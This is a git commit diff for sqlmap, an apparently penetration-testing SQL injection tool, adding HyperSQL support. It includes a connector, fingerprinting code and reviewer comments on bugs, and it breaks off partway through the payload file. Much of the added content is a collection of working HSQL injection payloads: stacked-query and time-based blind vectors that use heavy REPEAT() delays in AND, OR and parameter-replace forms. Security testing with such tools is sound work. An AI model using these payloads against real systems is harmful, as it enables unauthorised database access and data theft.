Merge pull request #475 from Meatballs1/hsql_clean

HSQL Payloads and Query Support
This commit is contained in:
Miroslav Stampar 2013-07-01 02:38:04 -07:00
commit aeb83ba651
17 changed files with 764 additions and 10 deletions


@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQL_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap
@ -42,6 +43,8 @@ from plugins.dbms.sybase import SybaseMap
from plugins.dbms.sybase.connector import Connector as SybaseConn
from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsql import HSQLMap
from plugins.dbms.hsql.connector import Connector as HSQLConn
def setHandler():
"""
@ -60,6 +63,7 @@ def setHandler():
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQL, HSQL_ALIASES, HSQLMap, HSQLConn),
]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)


@ -525,7 +525,7 @@ class Agent(object):
else:
return query
if Backend.isDbms(DBMS.MYSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.HSQL):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
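Review bot: The widened condition `Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.HSQL)` routes HSQL through the MySQL path that rewrites `SELECT ` into a multi-argument `CONCAT('%s', ... ,'%s')`, but the HSQL `<concatenate>` entry added to queries.xml in this same commit declares only the two-argument form `CONCAT(%s,%s)`; whether HSQL accepts the variadic form built here is not shown, so either confirm it or document the assumption with a comment such as `# HSQL is grouped with MySQL here because its CONCAT() is assumed variadic -- confirm for 1.7.x`. The enclosing method of `Agent` starts and ends outside the hunk.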


@ -3448,7 +3448,11 @@ def decodeHexValue(value):
retVal = retVal.decode("utf-16-le")
except UnicodeDecodeError:
pass
elif Backend.isDbms(DBMS.HSQL):
try:
retVal = retVal.decode("utf-16-be")
except UnicodeDecodeError:
pass
if not isinstance(retVal, unicode):
retVal = getUnicode(retVal, "utf8")
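Review bot: The new `elif Backend.isDbms(DBMS.HSQL)` branch needs a comment saying why HSQL values are decoded as UTF-16 big-endian while the branch above uses little-endian, since a reader cannot tell from here which encoding the hex source produces; something like `# RAWTOHEX() output is presumably UTF-16BE for character data -- confirm against the HSQL <hex> query in queries.xml`. As in the branch above, a failed decode is swallowed by `except UnicodeDecodeError: pass` and the raw bytes fall through to `getUnicode(retVal, "utf8")`, which will then mis-decode silently rather than fail; if that fallback is deliberate, say so in the same comment. decodeHexValue starts outside the hunk.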


@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQL_ALIASES
FIREBIRD_TYPES = {
"261": "BLOB",
@ -137,6 +138,7 @@ DBMS_DICT = {
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
DBMS.HSQL: (HSQL_ALIASES, "python jaydebeapi", "https://pypi.python.org/pypi/JayDeBeApi/", "hsql"),
}
FROM_DUMMY_TABLE = {
@ -145,6 +147,7 @@ FROM_DUMMY_TABLE = {
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQL: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
}
SQL_STATEMENTS = {
@ -186,7 +189,9 @@ SQL_STATEMENTS = {
"SQL data execution": (
"exec ",
"execute ", ),
"execute ",
"values ",
"call ", ),
"SQL transaction": (
"start transaction ",
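Review bot: `FROM_DUMMY_TABLE` maps HSQL to ` FROM INFORMATION_SCHEMA.SYSTEM_USERS`, which yields one row per defined user, whereas every other entry in that dict names a single-row source; any expression appended to it is evaluated once per user and inband results may come back duplicated. The fingerprint module in this commit uses `(VALUES(0))` as the one-row source for 2.x, so the 1.7-compatible choice here should at least be documented, e.g. `# SYSTEM_USERS may return several rows; a one-row (VALUES(0)) source only exists on >= 2.0`. The `"values "` and `"call "` additions to `SQL_STATEMENTS` apply to every DBMS, not only HSQL, which is presumably intended but deserves a comment since `values` also occurs inside ordinary INSERT statements.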


@ -33,6 +33,7 @@ class DBMS:
PGSQL = "PostgreSQL"
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQL = "HyperSQL"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
@ -45,6 +46,7 @@ class DBMS_DIRECTORY_NAME:
PGSQL = "postgresql"
SQLITE = "sqlite"
SYBASE = "sybase"
HSQL = "hsql"
class CUSTOM_LOGGING:
PAYLOAD = 9


@ -163,6 +163,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQL_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
@ -174,10 +175,11 @@ FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQL_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQL_ALIASES
SUPPORTED_OS = ("linux", "windows")
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")


@ -0,0 +1,39 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import HSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.hsql.enumeration import Enumeration
from plugins.dbms.hsql.filesystem import Filesystem
from plugins.dbms.hsql.fingerprint import Fingerprint
from plugins.dbms.hsql.syntax import Syntax
from plugins.dbms.hsql.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class HSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines MySQL methods
"""
def __init__(self):
self.excludeDbsList = HSQL_SYSTEM_DBS
self.sysUdfs = {
# UDF name: UDF return data-type
"sys_exec": { "return": "int" },
"sys_eval": { "return": "string" },
"sys_bineval": { "return": "int" }
}
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.HSQL] = Syntax.escape
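Review bot: The class docstring on `class HSQLMap` reads `This class defines MySQL methods`, a copy-paste leftover that should read `This class defines HSQL methods`. `self.sysUdfs` lists `sys_exec`, `sys_eval` and `sys_bineval` with MySQL return types, yet the HSQL `Takeover` and `Filesystem` classes added in this commit raise `SqlmapUnsupportedFeatureException` for every operation, so this table appears to be dead configuration carried over from the MySQL plugin; either drop it or mark it with `# placeholder copied from MySQL; no UDF support is implemented for HSQL`.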


@ -0,0 +1,91 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
from thirdparty import jaydebeapi
import jpype
except ImportError, msg:
pass
import logging
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://jpype.sourceforge.net/
User guide: http://jpype.sourceforge.net/doc/user-guide/userguide.html
API: http://code.google.com/p/pymysql/
Debian package: <none>
License: Apache License V2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
jar = './thirdparty/hsql/hsqldb.jar'
args='-Djava.class.path=%s' % jar
jvm_path = jpype.getDefaultJVMPath()
jpype.startJVM(jvm_path, args)
except (Exception), msg: #todo fix with specific error
raise SqlmapConnectionException(msg[0])
try:
driver = 'org.hsqldb.jdbc.JDBCDriver'
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver,
connection_string,
str(self.user),
str(self.password))
except (Exception), msg: #todo what kind of error is this?!
raise SqlmapConnectionException(msg[0])
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except (Exception), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
retVal = False
try:
self.cursor.execute(query)
retVal = True
except (Exception), msg: #todo fix with specific error
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except Exception, msg: #todo fix with specific error
raise SqlmapConnectionException(msg[1])
self.connector.commit()
return retVal
def select(self, query):
retVal = None
upper_query = query.upper()
if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")):
query = "VALUES %s" % query
if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query:
query = "%s FROM (VALUES(0))" % query
self.cursor.execute(query)
retVal = self.cursor.fetchall()
return retVal
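Review bot: `connect()` hard-codes `connection_string = 'jdbc:hsqldb:mem:.'`, so a direct connection always opens a fresh in-memory database instead of the `self.hostname`/`self.db` target that the commented-out alternative on the same line shows was intended. In `execute()` the second `except Exception, msg:` is unreachable because the clause before it already catches `Exception`, `msg[1]` raises `IndexError` for single-argument exceptions, and `self.connector.commit()` runs even when the statement failed. `select()` calls `self.cursor.execute(query)` directly rather than `self.execute(query)`, so its errors bypass the logging path, and `query.upper()` runs before the `if query` guard. The `jar = './thirdparty/hsql/hsqldb.jar'` path is relative to the current working directory, and the class docstring still points at the pymysql API URL.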


@ -0,0 +1,33 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.request import inject
from lib.parse.banner import bannerParser
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)
def getBanner(self):
if not conf.getBanner:
return
if kb.data.banner is None:
infoMsg = "fetching banner"
logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
return kb.data.banner
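Review bot: `bannerParser` is imported but never called, so `getBanner()` stores the raw `DATABASE_VERSION()` result and leaves `kb.bannerFp` untouched; the `Fingerprint.getFingerprint()` added in this commit reads `kb.bannerFp`, so its 'banner parsing fingerprint' line will presumably never appear for HSQL. If parsing is intended, add `bannerParser(kb.data.banner)` after the `inject.getValue` line; otherwise drop the import. It is also not visible what this override changes relative to the generic `getBanner`, so a one-line docstring stating why it is overridden would help the next maintainer.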


@ -0,0 +1,21 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def readFile(self, rFile):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)


@ -0,0 +1,146 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import unArrayizeValue
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import HSQL_ALIASES
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.HSQL)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
return value
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
banVer = Format.getDbms([banVer] if banVer else None)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
"""
References for fingerprint:
DATABASE_VERSION()
version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')
version 2.2.5 added SYSTIMESTAMP function
version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions
version 2.2.0 added support for ROWNUM() function
version 2.1.0 added MEDIAN aggregate function
version < 2.0.1 added support for datetime ROUND and TRUNC functions
version 2.0.0 added VALUES support
version 1.8.0.4 Added org.hsqldb.Library function, getDatabaseFullProductVersion to return the
full version string, including the 4th digit (e.g 1.8.0.4).
version 1.7.2 CASE statements added and INFORMATION_SCHEMA
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(HSQL_ALIASES) \
or conf.dbms in HSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.HSQL, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("1.7.2"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.HSQL
logger.info(infoMsg)
# TODO This gets mangled in UNION queries because of the dummy table
result = inject.checkBooleanExpression("\"java.lang.Math.sqrt\"(1)=1")
if result:
infoMsg = "confirming %s" % DBMS.HSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.HSQL
logger.warn(warnMsg)
return False
else:
kb.data.has_information_schema = True
Backend.setVersion(">= 1.7.2")
setDbms("%s 1.7.2" % DBMS.HSQL)
if not conf.extensiveFp:
return True
banner = self.getBanner()
if banner:
Backend.setVersion("= %s" % banner)
else:
if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"):
Backend.setVersionList([">= 2.0.0", "< 2.3.0"])
else:
banner = unArrayizeValue(inject.getValue("\"org.hsqldb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True))
if banner:
Backend.setVersion("= %s" % banner)
else:
Backend.setVersionList([">= 1.7.2", "< 1.8.0"])
return True
else:
warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQL
logger.warn(warnMsg)
return False
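Review bot: In `getFingerprint()`, `banVer` is `None` whenever `kb.bannerFp` lacks `dbmsVersion`, and the following `if re.search("-log$", kb.data.banner): banVer += ", logging enabled"` then raises `TypeError`; guard it with `if banVer and re.search("-log$", kb.data.banner):`. The `-log` suffix check looks inherited from the MySQL fingerprint and is probably meaningless for a `DATABASE_VERSION()` banner, so consider dropping that branch entirely. The `checkDbms` docstring has a typo, `functio` for `function`, and the `# TODO This gets mangled in UNION queries because of the dummy table` comment should name which dummy table so the TODO is actionable.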


@ -0,0 +1,26 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
from lib.core.convert import utf8encode
from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax):
def __init__(self):
GenericSyntax.__init__(self)
@staticmethod
def escape(expression, quote=True):
"""
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar'
"""
def escaper(value):
return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value)))
return Syntax._escape(expression, quote, escaper)
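Review bot: `binascii` and `utf8encode` are imported but unused in `syntax.py`; drop them. The inner `escaper` indexes with `xrange(len(value))` where iterating the string directly is clearer: `return "||".join("CHAR(%d)" % ord(c) for c in value)`. Whether HSQL's `CHAR()` accepts code points above 255 is not shown here; if it does not, non-Latin-1 characters in a quoted literal will be escaped incorrectly, which is worth a comment or a second doctest next to the existing one.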


@ -0,0 +1,29 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
GenericTakeover.__init__(self)
def osCmd(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osShell(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osPwn(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osSmb(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)


@ -510,7 +510,7 @@ class Databases:
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):


@ -159,7 +159,7 @@ class Entries:
entries = zip(*[entries[colName] for colName in colList])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)


@ -1127,7 +1127,6 @@ Formats:
</test>
<!-- End of stacked conditional-error blind queries tests -->
<!-- Error-based tests - WHERE or HAVING clause -->
<test>
<title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
@ -1878,7 +1877,6 @@ Formats:
-->
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
@ -1996,7 +1994,6 @@ Formats:
</test>
<!-- End of inline queries tests -->
<!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
@ -2245,6 +2242,48 @@ Formats:
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 2.0 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of stacked queries tests -->
@ -2712,6 +2751,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of AND time-based blind tests -->
@ -2931,6 +3052,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests -->
@ -3211,7 +3414,7 @@ Formats:
</test>
<test>
<title>IBM DB2 AND time-based blind (heavy query)</title>
<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
@ -3228,6 +3431,47 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
